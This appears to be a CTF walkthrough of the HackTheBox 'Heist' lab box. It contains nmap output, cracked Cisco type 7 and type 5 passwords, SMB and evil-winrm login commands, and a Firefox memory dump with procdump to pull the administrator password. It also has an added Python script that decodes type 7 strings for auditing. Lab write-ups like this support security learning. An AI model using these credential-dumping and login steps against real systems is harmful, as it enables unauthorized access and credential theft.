Heist (Easy)
Enumeration
Nmap
nmap -sC -sV -oA nmap/10.10.10.149 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-09T16:24:17
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 9 12:24:52 2021 -- 1 IP address (1 host up) scanned in 72.60 seconds
# Nmap 7.91 scan initiated Fri Jul 9 12:47:56 2021 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/_full_tcp_nmap.txt -oX /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/xml/_full_tcp_nmap.xml 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up, received user-set (0.090s latency).
Scanned at 2021-07-09 12:47:57 EDT for 350s
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 20087/tcp): CLEAN (Timeout)
| Check 2 (port 48515/tcp): CLEAN (Timeout)
| Check 3 (port 25486/udp): CLEAN (Timeout)
| Check 4 (port 40753/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-09T16:53:10
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 9 12:53:47 2021 -- 1 IP address (1 host up) scanned in 350.69 seconds
As usual, I start by checking port 80 and port 445.
Port 80

We are greeted by a support login page, and we are able to log in as guest.

When we click the attachment in the post by user Hazard, we can see this:

Some research shows that Cisco type 7 passwords are reversible, so they can be "cracked" directly.
We can use this website to crack it.
For the type 5 password, we can use John the Ripper to crack it.
Hash                                 Password
02375012182C1A1D751618034F36415408   Q4)sJu\Y8qz*A3?d
0242114B0E143F015F5D1E161713         $uperP@ssword
$1$pdQG$o8nrSzsGXeaduXrjlvKc91       stealth1agent
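As an added example (not part of the original writeup), here is a small Python audit script that flags weak credential types in a Cisco IOS config and shows why type 7 is reversible by decoding the two type 7 strings listed above. Only the three credential strings come from the box; the config lines and usernames around them are constructed placeholders.

```python
import re

# Cisco's fixed type 7 XOR key. It is publicly documented, which is exactly
# why type 7 "encryption" is reversible rather than a real one-way hash.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encoded: str) -> str:
    """Reverse a type 7 string: 2-digit decimal seed, then hex bytes XORed with the key."""
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("ascii")


# Matches "password <type> <value>" and "secret <type> <value>" in IOS configs.
CRED_RE = re.compile(r"\b(?:password|secret)\s+(\d)\s+(\S+)")

# Verdict per credential type; 8 (PBKDF2-SHA256) and 9 (scrypt) are the acceptable ones.
VERDICTS = {
    "0": "PLAINTEXT: stored in the clear; migrate to type 9",
    "5": "WEAK: MD5-crypt, cheap to brute-force offline; migrate to type 9",
    "7": "REVERSIBLE: trivially decoded; migrate to type 9",
    "8": "OK: PBKDF2-SHA256",
    "9": "OK: scrypt",
}


def audit_config(config_text: str) -> list:
    """Return (type, verdict, recovered_plaintext_or_None) for each credential line."""
    findings = []
    for line in config_text.splitlines():
        m = CRED_RE.search(line)
        if not m:
            continue
        ptype, value = m.groups()
        recovered = decode_type7(value) if ptype == "7" else None
        findings.append((ptype, VERDICTS.get(ptype, "UNKNOWN type"), recovered))
    return findings


# Constructed sample config: the three credential strings are from the writeup,
# the usernames and surrounding lines are placeholders, not the box's real file.
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rtr-user1 password 7 0242114B0E143F015F5D1E161713
username rtr-user2 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for ptype, verdict, recovered in audit_config(SAMPLE_CONFIG):
        print(f"type {ptype}: {verdict}" + (f" (decodes to {recovered!r})" if recovered else ""))
```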
After a lot of trial and error, we can finally log in to SMB with the right pair of credentials.
smbclient --list //10.10.10.149/IPC$ -U hazard%stealth1agent

Next, I use impacket-lookupsid to enumerate other possible users.
impacket-lookupsid hazard:stealth1agent@10.10.10.149

We can see there are users Chase and Jason.
From the full TCP nmap scan, we know that port 5985 is WinRM, which lets us log in to the system.
User
We can log in as user Chase with the password Q4)sJu\Y8qz*A3?d:
evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"

Got the user flag!

Privilege Escalation
After some enumeration, we can see that Mozilla Firefox is installed on the machine.

From the ps command, we can see that there are a few Firefox processes running.

We can use ProcDump64 to dump the memory of one of these processes, then use strings to extract the readable text from the dump.

./procdump64.exe -accepteula -ma 6728

We can see a dump file being created.
Now we can use strings.exe to write the readable strings to a file.
./strings.exe -accepteula firefox.exe_210802_163838.dmp > readable.txt
After that, we can download the file containing the readable strings.
Searching the file for "password" in Sublime shows this:

Then, we can log in as administrator using the password shown.


Congrats!